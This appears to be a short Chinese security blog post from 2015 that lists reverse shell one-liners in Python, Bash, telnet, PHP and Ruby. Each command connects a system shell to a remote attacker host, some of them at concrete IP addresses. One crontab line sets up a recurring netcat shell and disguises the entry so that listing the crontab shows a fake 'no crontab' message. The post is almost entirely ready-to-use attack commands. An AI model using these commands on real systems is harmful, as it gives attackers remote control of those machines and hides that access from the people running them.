MENU

常用的转发脚本

December 5, 2015 • Security

常用的转发脚本

Python
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",2333));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Linux
exec 2>&0 0<&196;exec 196<>/dev/tcp/attackerIP/端口

Telnet(这种缺陷是会建立test文件,好处是不怎么依赖环境)
mknod test p && telnet 115.28.85.23 65512 0<test | /bin/bash 1>test

Crontab
(crontab -l;printf "*/5 * * * *  /bin/nc 192.168.196.129 22222 -e /bin/sh;\rno crontab for `whoami`%100c\n")|crontab –

Php
php -r '$sock=fsockopen("10.10.14.101",65512);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.14.101",65512).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Bash
bash -i >& /dev/tcp/x.x.x.x/2333 0>&1
Archives QR Code
QR Code for this page
Tipping QR Code